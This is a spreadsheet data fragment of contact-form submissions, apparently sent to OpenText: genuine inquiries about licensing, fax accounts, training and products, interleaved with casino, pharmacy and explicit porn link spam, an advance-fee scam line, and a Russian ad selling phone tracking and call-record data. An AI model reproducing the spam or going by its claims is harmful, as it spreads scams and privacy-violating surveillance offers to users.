&lt;a href="http://casinoline17.com/"&gt;online casino slots&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]online casino games[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casino slots&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]slot online[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;casino slots&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]cassino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino games&lt;/a&gt;</t>
  </si>
  <si>
    <t>Hello - I am interested in getting a quote and details for group training at Broadridge (NY 11717) (customer site). Can you let me know me when is the earliest we can schedule this training at Broadridge (NY) and also recommended (max) number of students? Call me if you need additional info.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Can you send me a quote for the following parts? The quantities are at the end. _x000D_
_x000D_
Thank you!_x000D_
_x000D_
OPENTEXT 1000025394-1 Exceed Single License (Electronic) Standard Connectivity 42_x000D_
OPENTEXT 1000025395-1 Exceed Single License (Electronic) Maintenance 42_x000D_
OPENTEXT 1000025394-1 Exceed Single License (Electronic) Standard Connectivity 29_x000D_
OPENTEXT 1000025395-1 Exceed Single License (Electronic) Maintenance 29_x000D_
OPENTEXT 1000034962-1 Secure Shell Single License (Electronic) Standard Connectivity 42_x000D_
OPENTEXT 1000034963-1 Secure Shell Single License (Electronic) Maintenance 42_x000D_
OPENTEXT 1000034962-1 Secure Shell Single License (Electronic) Standard Connectivity 29_x000D_
OPENTEXT 1000034963-1 Secure Shell Single License (Electronic) Maintenance 29</t>
  </si>
  <si>
    <t>I am looking to get support access for RC198035</t>
  </si>
  <si>
    <t>Hi - I applied for a space at the opentext innovation tour 2018, but I can no longer attend due to work commitments. _x000D_
_x000D_
coudl yu please release my place so another person may attend in my stead?</t>
  </si>
  <si>
    <t>Questions regarding more FOIP Channels._x000D_
need a quote to take our current FOIP of 8 channels to 24 Channels, and what would be the next bump up?</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.bucakosb.org.tr/images/class.asp?zp=331]Viagra 200mg[/url]_x000D_
 Write off of your work area. If you can produce a specialized area for your home place of work, it is possible to publish it off like a organization costs. This includes a share of all fees, which include mortgage loan or rent payments monthly payments, utilities and insurance coverage. Determine the square footage of the location you utilize when compared to complete square footage of your property, and break down the expenses consequently. Be careful however - the IRS will look closely at this kind of expense._x000D_
  [url=http://www.kuzuportal.com/css/color.asp?please=2]Gh Prezzo Farmacia[/url]_x000D_
 If you are suffering from a panic attack, end and check in on the breathing. Shallow inhaling brings about an increased heartbeat and insufficient oxygen. This makes your anxiety attack really feel more serious. Alternatively, concentrate on getting deep and very long breaths. Throughout the nasal area is better. Obtain that o2 in your body and the panic and anxiety attack just may possibly swiftly pass._x000D_
  [url=http://www.estherhelados.com.ar/css/home.asp?cat=576/]Viagra Online Paypal[/url]_x000D_
 Clean pearly whites delicately. Although it might seem like the easiest way to continue to keep the teeth clear is actually by cleaning challenging, it isn't real. Cleaning too hard or with bristles that are too hard may cause soreness, irritation, periodontal economic depression, and finally loose pearly whites. To avoid this, work with a remember to brush with soft nylon bristles and utilize delicate, circular scrubbing motions when cleaning._x000D_
  [url=http://www.imbm.org.tr/css/box.asp?h=70]Ansomone Comprar[/url]_x000D_
</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]casino slots[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;cassino&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]slot online[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;slot online&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]slot online[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;casinos online&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]play casino games online[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casino slots&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]casino games real money[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;slot game&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]kasino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casinos online&lt;/a&gt;</t>
  </si>
  <si>
    <t>online casino real money _x000D_
[url=http://casinogamelistus.com/]casino online[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;casino online&lt;/a&gt; _x000D_
online casino games</t>
  </si>
  <si>
    <t xml:space="preserve">I'm looking for information on licensing for EMC Captiva QuickScan Pro which I'm told has been sold to you.  </t>
  </si>
  <si>
    <t>dolina.maya@mail.ru</t>
  </si>
  <si>
    <t>I see that the ability to read .pdf files will be discontinued.  Will we still be able to view .tiff &amp; .jpg files?</t>
  </si>
  <si>
    <t>Pricing for OpenText eDocs DM</t>
  </si>
  <si>
    <t xml:space="preserve">PJSC "MegaFon" plans to purchase the IoT platform. The following independent modules (Lots) are considered for purchase:_x000D_
-	Lot1. Device management, support for interaction with Iot devices (in accordance with the requirements of 3GPP TS 23.682), as well as information security and Fraud control devices at the level of interaction with devices;_x000D_
-	 Lot 2. Operation reports and analytics, blocks of primary reporting and analytics of the operational level;_x000D_
-	Lot 3. Application Programming Interface (API), platform integration support interfaces with external applications in the form of sets, extensible API functions or micro service architecture;_x000D_
-	 Lot 4. User interfaces for common IoT solutions, the environment for developing and executing business applications, as well as analytical reporting and predictive analytics._x000D_
_x000D_
Please provide feedback if you have suitable solutions and if you are interested in participating in the tender. Also please provide information which lots above your solutions can cover. _x000D_
</t>
  </si>
  <si>
    <t>We are interested in your course 3-7622 OpenText Exstream Integrating Variable Data. I would like to get a detailed outline of the course content so that we can ensure that will cover our requirements.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We provide support for a company using Team Developer 5.2. Can we upgrade the applications to new/newer version of Team Developer without code rewrite?</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.estudioquadra.com/images/bread.asp?cat=7]Acquisto Cialis On Line[/url]_x000D_
 Your website's header could possibly be the very first thing website visitors see, nevertheless the footer of your site is also essential. You can utilize your footer in your favor and assist spiders since they navigate through your web site by duplicating your primary navigation and ensuring your footer backlinks are redirecting visitors to your site's most important web pages._x000D_
  [url=http://www.meteoto.com/hkkmzda/text.asp?id=235]Kamagra Achat France[/url]_x000D_
 Know your target audience. Video clips which are compelling offer you useful understanding and data the target audience desires to notice. Just like articles, you must learn the prospective audience and why they need to be careful about your video around other video clips. When you are aware what you want to share, try documenting your videos into small chunks to make the details quicker to recognize to them._x000D_
  [url=http://www.rbrandao.net/images/class.asp?jk=301]Kamagra Pas Cher En France[/url]_x000D_
 Smoking is only going to exacerbate your asthma, so you must stop instantly to place yourself in the most dependable position feasible. Decreasing the level of toxicity that goes into your respiratory system will go a long way in allowing you to breathe in less difficult, which can maximize your comfort level during the day._x000D_
  [url=http://www.smahle.com.br/light/class.asp?za=118]Buy Kigtropin From China[/url]_x000D_
</t>
  </si>
  <si>
    <t>I would like to buy the dwg viewer for $65 but now it wants to add maintenance! _x000D_
How do I delete the maintenance</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
für einen unserer Kunden sind wir auf der Suche nach dem Produkt D2 Documentum - Können Sie mir hierzu bitte weitere Informationen zusenden bzw. eine Anlaufstelle geben?_x000D_
_x000D_
Danke &amp; VG,_x000D_
Lennart Börngen</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen &amp; Herren, wir sind gerade auf der Suche nach einem cloudbasierten DMS mit rechtskonformer Archivierung aller Eingangsbelege und S/4  HANA Integration. Besonders würde mich in diesem Zusammenhang auch Ihr Lizenzmodell sowie ungefähre Einführungskosten interessieren. MFG R. Eger </t>
  </si>
  <si>
    <t>Would like to inquiry OpenText ECM product.</t>
  </si>
  <si>
    <t>[url=http://yoursexydream1.com/?u=r3nweky&amp;o=9hq2ucc]mature milfs in here[/url]</t>
  </si>
  <si>
    <t>Hello Leadership Team_x000D_
I am looking for Remote position where I can work from Bangalore India. I can manage the tasks globally &amp; support across the world.  This is a WIN-WIN situation for smaller companies I am willing to travel 10-25%._x000D_
_x000D_
I possess an enriching experience of nearly 23 years [10 in US &amp; 5 in Singapore]. My core competencies are in the CAE domain of Requirement Analysis, PMO, Project Management, Delivery/Product Management, Software Testing, Quality Assurance, Technical Support, Business Process Re Engineering (BPR), Business Development, Risk Mitigation, Process Optimization, Training &amp; Development, Knowledge management, Analytical Skills, Knowledge transfer and Innovation Management._x000D_
_x000D_
I have been exposed to Automotive, Aerospace and electronics consumer industry to deliver Business Application/Engineering software (CAE) solutions. I have MS Mech engg (from US) and PMP certified. GB certified &amp; CAP certified.  AGILE, SCRUM &amp; waterfall SDLC process _x000D_
_x000D_
I am seeking a challenging job that would synergize my skills and knowledge with the objectives of the organization. A responsible, reliable and committed worker, I will give my best both as a part of a team and working independently._x000D_
_x000D_
_x000D_
I can also contribute in the area of  Global Alliances_x000D_
_x000D_
1. PMO/ Program management/product management_x000D_
2. Global alliances/Global Operations/Process Improvement/Product Marketing_x000D_
3. Software Quality Assurance metrics /Manage Technical Support_x000D_
4. Software Manual and automated testing_x000D_
5. Individual contributing Role which requires working with multiple teams to achieve organization goals._x000D_
6. Business Development/Strategy-Roadmap/marketing_x000D_
7. Business Manager/Innovation Management_x000D_
8. Knowledge Management_x000D_
Willing to learn new things and ready to take new challenges who understand both the domains, this is where companies can take advantage of my profile. Hands on Experience on Tracking Project Related Metrics for organization (Specifically Finance)Good in Stat</t>
  </si>
  <si>
    <t xml:space="preserve">cialis 10mg or 20mg occupation_x000D_
 [url=http://walmartcialis.com]cialis over the counter walmart_x000D_
[/url]  cialis for prostate_x000D_
 &lt;a href="http://walmartcialis.com"&gt;cialis over the counter at walmart_x000D_
&lt;/a&gt; - order cialis online usa_x000D_
 cialis who is online_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are using a Webtop Platform at our QA envi  and we have a problem somthng with performance on network , how can i open a case / ask the support forum ?? _x000D_
thanks _x000D_
</t>
  </si>
  <si>
    <t>slot game _x000D_
[url=http://casinogamelistus.com/]slot game[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;casinos online&lt;/a&gt; _x000D_
online casino slots</t>
  </si>
  <si>
    <t>To get local email contact for Documentum technical sales as we are seeking EDMS for a Oil and Gas Capital Project.  Pls contact by email.  Thanks.</t>
  </si>
  <si>
    <t>Fax account is lock.  Please unlock and send confirmation.  Thank you.</t>
  </si>
  <si>
    <t>Услуги частного детектива _x000D_
 _x000D_
Предоставляем полный спектр детективных услуг _x000D_
Наши плюсы: Всегда озвучиваем возможности и информацию как есть, наши цены в 2-3 раза ниже чем у большинства конкурентов, огромный опыт и запас креатива, делаем то, что многие считают невозможным. _x000D_
Не берем предоплат, не занимаемся высасыванием денег. Консультация бесплатно. _x000D_
 _x000D_
1. Пробив абсолютно любой информации _x000D_
Пробив по мобильным системам (детализация, паспортные данные, определение местоположения) _x000D_
 _x000D_
Спектр услуг: _x000D_
Сбор абсолютно любой информации о человеке _x000D_
Определение местонахождения человека по номеру телефона _x000D_
Детализация звонков и смс _x000D_
Информация из почт и социальных сетей _x000D_
Выявление факта супружеской неверности _x000D_
Розыск должников _x000D_
Розыск имущества должника _x000D_
Розыск безвести пропавших людей _x000D_
Розыск родственников и людей с которыми утеряна связь _x000D_
Розыск мошенников _x000D_
Проверка образа жизни ребенка _x000D_
Помощь родителям (уход из дома, правонарушения, наркомания) _x000D_
Услуги по выявлению фальшивых невест _x000D_
Содействие адвокатам _x000D_
Помощь в уголовном расследовании, сбор доказательств _x000D_
Сбор компромата _x000D_
 _x000D_
Сбор информации о юридических лицах _x000D_
Проверка персонала _x000D_
 _x000D_
Обеспечение анонимной связи и информационной безопасности _x000D_
Контроль мобильного телефона _x000D_
Защита компьютерной техники _x000D_
Восстановление утерянной информации _x000D_
 _x000D_
Оказание юридической помощи _x000D_
Оказание коллекторских услуг _x000D_
 _x000D_
Контакты: _x000D_
+79180520135 - (телефон, viber, whatsapp, skype) _x000D_
Telegram     - @RFDetective _x000D_
почта        - RFDetektiv@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">Please fix my private on Google play store and Google </t>
  </si>
  <si>
    <t>Pyramid Cyber is a global Digital Forensics and Cyber Security company having presence in United States, Sub Saharan Africa and India. _x000D_
_x000D_
Our team in Kenya, Rwanda and Ethiopia has been developing opportunities with Law Enforcement and Enterprises for both Cyber forensic labs as well as cyber security/intelligence solutions. We feel Guidance/Opentext products fits well into solutions and services we are providing to our customers. _x000D_
_x000D_
Kindly send us the partnership details and connect us to the person responsible for EMEA._x000D_
_x000D_
Regards...Alok</t>
  </si>
  <si>
    <t xml:space="preserve">viagra dose medications contact info_x000D_
 [url=http://rxviagracan.com]viagra pills for sale online_x000D_
[/url]  buy viagra and viagra online overnight shipping viagra_x000D_
 &lt;a href="http://rxviagracan.com"&gt;generic viagra for sale_x000D_
&lt;/a&gt; - new ed treatments_x000D_
 viagra custombbs.cgi_x000D_
</t>
  </si>
  <si>
    <t>I wanted to see when there are going to be Captiva 7.7 training course available.</t>
  </si>
  <si>
    <t>looking for product called Imaging_x000D_
used to be made by Global 360_x000D_
their website directs here</t>
  </si>
  <si>
    <t>remark</t>
  </si>
  <si>
    <t>i dont know anythig aout it</t>
  </si>
  <si>
    <t xml:space="preserve">Afternoon._x000D_
_x000D_
I am a consultant working on behalf of our client, who does not wish to be named at this time.  We are in the initial stage and are comprising information regarding solutions that may fit their business needs involving HealthCare Coverage._x000D_
_x000D_
The following are some requirements we are looking for:_x000D_
_x000D_
•	Application &amp; Enrollment_x000D_
•	Medical underwriting_x000D_
•	Coordination of Benefits_x000D_
•	Receivables &amp; Payables_x000D_
•	Policy Management_x000D_
•	Claims Management &amp; Adjudication_x000D_
•	Member Self Service_x000D_
•	Broker Self Service/Support_x000D_
•	Direct from Provider_x000D_
•	Analytics &amp; Business Intelligence_x000D_
_x000D_
1.	Does your software meet any/all mentioned requirements? _x000D_
        a.      If not, which ones does it work for?_x000D_
        b.      For those requirements it does not deal with, are there other software packages that you have worked with before to fill in the gaps?_x000D_
2.	Is this an onsite installation or a hosted installation?_x000D_
        a.	Onsite_x000D_
               i.	What are the costs of purchase_x000D_
              ii.	Are there additional licensing costs_x000D_
              iii.	What is the annual maintenance cost_x000D_
              iv.	What are the minimum hardware requirements_x000D_
        b.	Hosted_x000D_
              i.  	Where is this hosted(country)_x000D_
              ii.	Are there setup costs_x000D_
              iii.	Where are the licensing fees (this may be per installation, per user or just one of each?)_x000D_
              iv.	Is there a yearly maintenance cost_x000D_
3.	What is your established client base? Any insurance clients in Canada?_x000D_
_x000D_
If you can send any information at this time, our team will review and discuss booking additional time with your team to further investigate._x000D_
_x000D_
Thank you in advance for your assistance and any information you can share._x000D_
_x000D_
Appreciate your help._x000D_
_x000D_
Karen S._x000D_
</t>
  </si>
  <si>
    <t>We are modifying forms in TeleForm and are coming across and error preventing the form from going into a Batch. I have screenshots of the error I can share once I am contacted.</t>
  </si>
  <si>
    <t>I'm looking for a resolution on how to process a migration from a FirstDoc solution to a D2 application. We are experiencing some incompatibilities between the PDF Fusion generated renditions. Our source documents use placeholders in the Word documents which get filled with values (from metadata or audit trail) during a publishing process, however the current configuration does not create a PDF filled with the metadata and a signature page, but with additional overlays which cannot be removed later in the D2 application as they are a fixed 'melted' with the PDF file. Do you have a solution to that problem? Thanks, Danuta</t>
  </si>
  <si>
    <t xml:space="preserve">Re-establishing contact </t>
  </si>
  <si>
    <t xml:space="preserve">I am reaching out as the new Admin Assistant for PSNC Energy (Apex Location) _x000D_
I have taken over for Becky Pool - and as I was looking through some paperwork she left behind I see we have an account with you for our faxes. I want to ensure all the information is up to date so we are getting everything that we are supposed to. Thank you so much for helping me find out this information. </t>
  </si>
  <si>
    <t>We currently use Pixtools for scanning in our desktop application. Do you offer any products that support scanning from a browser? If so, what are the licensing fees, have sample downloads for evaluation?</t>
  </si>
  <si>
    <t>Team, _x000D_
_x000D_
Can you please provide me with the license information for the PO# P10002479691 sent to Opentext. As the customer has lost it and they are asking for it. It is the customer satisfaction issue. If you can please provide the copy of the licensing information which i can sent to the customer. _x000D_
_x000D_
Thanks !</t>
  </si>
  <si>
    <t>Right Fax Virtualization</t>
  </si>
  <si>
    <t xml:space="preserve">I was wondering if ACH is an acceptable form of payment. _x000D_
If yes, kindly please provide banking information and W9. _x000D_
If no, please confirm payment remittance address for check payment._x000D_
</t>
  </si>
  <si>
    <t>неплохой вебсайт [url=http://ruspdd.com/]ПДД[/url]</t>
  </si>
  <si>
    <t>Looking to acquire software to manage multiple aspects of our quality managements system.</t>
  </si>
  <si>
    <t>Looking for pricing options.  currently looking for a new vendor to handle our faxing.  Would like to be able to fax from our HP Scanners and copier.  Would also like the ability to print to fax and smtp faxing.</t>
  </si>
  <si>
    <t>good afternoon,_x000D_
_x000D_
sOU THE COMPANY ACCOUNT MANAGER IN THE COVISINT AND SOME CONTRIBUTOR HAS TRIED TO ACCESS FOR MORE THAN 03 TIMES WITH INCORRECT PASSWORD AND BLOCKED MY ACCESS._x000D_
_x000D_
I DO NOT REMEMBER THE KEY RESPONSE TO UNLOCK THE PASSWORD, IT WILL BE ABLE TO HELP ME._x000D_
_x000D_
_x000D_
THANKFUL,_x000D_
_x000D_
_x000D_
JOSEMAR</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested in acquiring our recently updated contact list of “Higher Education Industry Professionals” with emails address? If so, please let me know your target audience. I will get back to you with counts and best pricing option._x000D_
_x000D_
Target Industry:  _____________; Geography:  ______________; Job Title (Any):  _________________:_x000D_
_x000D_
Would you like to try a sample for your review or a quick call to understand how can we best serve you? Please let me know your thoughts._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Marcus Ford</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]slot game[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;casino games&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]online casino games[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;casino online&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]slot game[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;casinos online&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]slot game[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;play casino games online&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]slot online[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;online casino&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]play casino games online[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino real money&lt;/a&gt;</t>
  </si>
  <si>
    <t>Hi, I wanted to introduce myself my gold is in dubai security to be picked up by Sgt Smith Jefferson of th US Army</t>
  </si>
  <si>
    <t>Bonjour_x000D_
Nous souhaiterions avoir plus d'informations sur vos solutions de scan/workflow sur les factures fournisseurs intégrées avec SAP. Nous cherchons effectivement à améliorer notre process de comptabilité fournisseur qui est fait à la main à ce jour, dans SAP._x000D_
_x000D_
Pourriez-vous me rappeler a ce sujet et discuter des options que vous proposez ?_x000D_
Merci d'avance_x000D_
Cordialement_x000D_
Mickael Cheron</t>
  </si>
  <si>
    <t>Inquiry about content management, reporting metrics, automated features, and repository capabilities.</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]online casino slots[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;online casino real money&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]slot online[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;slot online&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]casino online[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;casino games real money&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]slot game[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casino games&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]casino games[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;online casino games&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]play casino games online[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;cassino&lt;/a&gt;</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://casinogameslistonline.com/]best online casino[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;online casino games&lt;/a&gt; _x000D_
casinos online</t>
  </si>
  <si>
    <t>We are current users of MediaBin and running off of version 8.2 and I'm curious about an upgrade to the latest version. What is the latest version and is it possible for us to upgrade our current system? Please email me with information. Thanks so much</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]online casino slots[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;slot game&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]online casino slots[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;casinos online&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]slot online[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;casino games slots&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]online casino[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;play casino games online&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]casino games[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]online casino slots[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino real money&lt;/a&gt;</t>
  </si>
  <si>
    <t>Собираюсь в ближайшее время по делам лететь в Челябинск. _x000D_
Дайте информацию кто знает об городе. _x000D_
Где можно отдохнуть? Куда сходить? _x000D_
Может расскажите где посмотреть подробную информацию? _x000D_
 _x000D_
Заранее спасибо!)</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]kasino[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;cassino&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]kasino[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;slot online&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]online casino real money[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;online casino games&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]online casino[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casinos online&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]casino slots[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;casino games real money&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]casino games real money[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casinos online&lt;/a&gt;</t>
  </si>
  <si>
    <t>play casino games online _x000D_
[url=http://casinogameslistonline.com/]online casino gambling[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;online casino&lt;/a&gt; _x000D_
cassino</t>
  </si>
  <si>
    <t xml:space="preserve">viagra 10mg vs 20mg the team_x000D_
 [url=http://gtviagracan.com]viagra for sale_x000D_
[/url]  viagra coupon lilly help_x000D_
 &lt;a href="http://gtviagracan.com"&gt;viagra sale_x000D_
&lt;/a&gt; - viagra with viagra_x000D_
 how long does viagra take to work_x000D_
</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
Im Zuge meiner Masterarbeit bei der Daimler AG beschäftige ich mich mit dem Thema Wissensmanagement und bin bei der Suche nach einer geeigneten Softwarelösung sehr häufig auf ihr Produkt Livelink gestoßen._x000D_
_x000D_
Leider konnte ich jedoch keine Umfassenden Informationen finden um eine fundierte Analyse und Bewertung der Software durchführen zu können. _x000D_
_x000D_
Über die Zusendung von Informationen bezüglich des Funktionsumfangs, den Komponenten und des Pricings würde ich mich sehr freuen._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Fabian Hainke</t>
  </si>
  <si>
    <t>How do I add a new GS1 Company Prefix to my account?</t>
  </si>
  <si>
    <t>Internship Application Process Follow-up</t>
  </si>
  <si>
    <t>We have opentext image viewer 10.5.0. Can you set it so when the viewer opens, it automatically goes to 200% for viewing of the image instead of defaulting to 100%? Is there a way to set that up - maybe from an IT perspective?</t>
  </si>
  <si>
    <t>A nonprofit client of ours would like a new WCMS. We want to see if it makes sense to bring in someone like you for the demos.  Thank you.</t>
  </si>
  <si>
    <t>Hej_x000D_
 _x000D_
Jag och min kollega Olle Dahlén driver ett projekt för att utvärdera möjligheten och nyttan, och därefter att kravställa, värdera och i slutändan implementera ett nytt informationshanteringssystem på AB Transitio. Först och främst skall det kommande systemet lagra – och väl hantera - en mycket stor mängd fordonsdokumentation (för ett flertal olika tågsystem, och i ett flertal olika filformat), informationen skall vidare också hanteras av flera olika inblandade aktörer (ägare, operatörer, förvaltare) med sinsemellan olika funktionella behov. Systemet ska som tillägg kunna införliva all projektinformation kring dessa fordon (avtal, protokoll, korrespondens, presentationer, utredningar, ekonomisk information mm). Dessutom finns tydliga behov av integrationer med kringliggande system runt Asset management, ekonomisystem, analytics mm, även om det ligger en bit framåt i tiden. _x000D_
 _x000D_
Vi skriver till er idag då vi gärna skulle vilja få till en diskussion om hur ni, utifrån era systemstöd, ser på kombinationen av teknisk dokumentation och mer traditionell administrativ information (vad avser offentlig förvaltning) och hur det kan hanteras på ett effektivt och kvalitetssäkrat vis. Transitio har, trots de stora värden vi äger och förvaltar, en liten organisation varvid en tjänstelösning känns som det mest aktuella. Vi är därför intresserade av att höra vilken erfarenhet ni har av att leverera denna typ av kombinerade lösningar, i Sverige och kanske utomlands?_x000D_
 _x000D_
Vi skulle gärna vilja träffa er inom en snar framtid och i diskussion, gärna kombinerat med en förevisning, se vilka möjligheter ni skulle ha att erbjuda en systemlösning som passar oss. _x000D_
_x000D_
Preliminärt planerar vi att gå ut med en upphandling under hösten 2018._x000D_
 _x000D_
Vi ser fram emot ert svar.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I have been using a First Class email address since 2006 (The East-West Center, APLP), but have recently lost access. I contacted APLP and they told me that it was deactivated last year. I did not receive notice about deactivation and still have a lot of personal, academic, and professional information in my account. They referred me to Lawrence Wu (lwu@telus.net), but I have yet to get a response. What is the best way to recover this information?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Steve</t>
  </si>
  <si>
    <t>Details in OTCS Ticket 3433046_x000D_
I cant access to download section:_x000D_
Content Server Error: _x000D_
[Sorry, no exact match was found for an item with the Nickname "61738756". Either it does not exist or you do not have permission to access it. If you were sent a link to this item, please contact the sender for assistance.]</t>
  </si>
  <si>
    <t>Hello, I'm looking for Documentum Capital Projects (EPFM) certification. Is it available?</t>
  </si>
  <si>
    <t>Hardcore Fucking Sex Video Hot Group Sex Clip , vintage handjob in theater porn two guys girl sex ass spanking while fucked movie . Hottest Girl Porn Video France Gall Porn Full Film Skinny Boobs Porn Video  classic gangbang cum swallow . Free Huge Shemale Cock Gallery Free Girl And Shemale Movie  - big cock reality porn free classic interracial flash porn video . porn girls get wild . _x000D_
[url=http://classpornx.com/free-exgirlfriend-sex-videos.html]free exgirlfriend sex videos[/url]  [url=http://classpornx.com/001/good-porn-website.html]good porn website[/url]  [url=http://classpornx.com/002/video-homemade-sex-video.html]video homemade sex video[/url]  [url=http://classpornx.com/003/porn-gallery-download.html]porn gallery download[/url]  [url=http://classpornx.com/004/muscle-chick-sex-movie.html]muscle chick sex movie[/url]  [url=http://classpornx.com/005/erotic-anal-tube.html]erotic anal tube[/url]  [url=http://classpornx.com/006/milking-tits-fucking-video.html]milking tits fucking video[/url]  [url=http://classpornx.com/007/granny-matures-sex-videos.html]granny matures sex videos[/url]  [url=http://classpornx.com/008/movie-girls-suck-and-fucking.html]movie girls suck and fucking[/url]  [url=http://classpornx.com/009/nigro-dick-sex-video.html]nigro dick sex video[/url]  Banana Insertion Movie Guy Sex Wife Sucks Dick Video  - black osa lovely porn tranny porn video largos . [url=http://classpornx.com/010/xxx-sexce-video.html]xxx sexce video[/url]  [url=http://classpornx.com/011/movie-extreme-brutal-sex.html]movie extreme brutal sex[/url]  [url=http://classpornx.com/012/others-fuck-wife.html]others fuck wife[/url]  Free Pregnant Sex Film High Res Movie Fuck , melissa midwest hardcore fucked free video tiny pussy teen porn video xxx hairy pussy porn . Gorgeous Blonde Anal Movie Amateur Wife Having Sex With Stranger Emo Teen Blowjob Movie  guy porn couple movie . [url=http://classpornx.com/013/youporn-girls-masturbation-and-orgasm.html]youporn girls masturbation and org</t>
  </si>
  <si>
    <t>Hi, i want to ask, if it is still possible to buy EMC Quickscan Pro form your company? I asked on dellemc, and they told me, that i have to ask on your sites. I found on some sites, that Quickscan PRO is not selling anymore, is it true? And if it is true, is it possible to use, last version with some universal key, without any support?  Thx. Best regards Vladimir Postulka</t>
  </si>
  <si>
    <t>Qfiniti Partnership</t>
  </si>
  <si>
    <t>Dear support team,_x000D_
_x000D_
We are looking for a CMS for a museum in Qatar. The tasks of this CMs should be uploading content to the museum players (the players will be Brightsigns, NUCs, RMG networks) in scheduled times. Do you think your product can meet the requirements?_x000D_
_x000D_
Please contact me by mail,_x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.canvirtravels.com/care/button.asp?y=316-Levitra-Alcohol-Comprar-Cialis-En-Andorra-Viagra-Online-Paypal]Levitra Alcohol[/url]_x000D_
 Should you be a novice to angling, you must spend money on high quality devices. You will need a reliable rod: discover sizes and weight loads and the way particular rods are more ideal for a specific sort of sea food. You must almost certainly get yourself a fundamental rod in case you are just beginning._x000D_
  [url=http://www.ecmaindia.in/css/export.asp?mpgid=238]Kamagra Legal EspaÃ±a[/url]_x000D_
